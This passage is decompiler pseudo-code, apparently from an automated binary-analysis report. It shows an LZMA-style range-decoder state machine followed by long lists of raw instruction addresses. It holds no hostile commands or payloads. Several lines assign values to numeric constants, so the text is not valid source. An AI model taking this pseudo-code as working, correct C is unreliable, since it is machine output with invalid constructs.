											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406481
0x00406481
0x00406481
0x00406481
0x00406487
0x0040648b
0x0040648f
0x00406499
0x004064a7
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b4
0x004067b8
0x00000000
0x00000000
0x004067ba
0x004067c3
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b8
0x00000000
0x00000000
0x00000000
0x00406813
0x00406813
0x0040678c
0x00406790
0x004068c8
0x004068c8
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406796
0x0040679c
0x004067a3
0x004067ab
0x004067ab
0x004067ae
0x00000000
0x004067ae
0x00406818
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef0
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x0040683b
0x00000000
0x0040683b
0x00405f95
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x0040684a
0x00000000
0x0040684a
0x00406005
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068bc
0x00000000
0x004068bc
0x00406713
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00000000
0x0040604c
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062eb
0x004062ef
0x0040630d
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406414
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406682
0x00406686
0x004066a8
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00406745
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406830
0x00406833
0x00406734
0x00406734
0x00406734
0x00000000
0x0040673a
0x00000000
0x0040646a
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00000000
0x00000000
0x00000000
0x004064af
0x004064af
0x004064b2
0x004064e8
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x00406548
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00406546
0x00000000
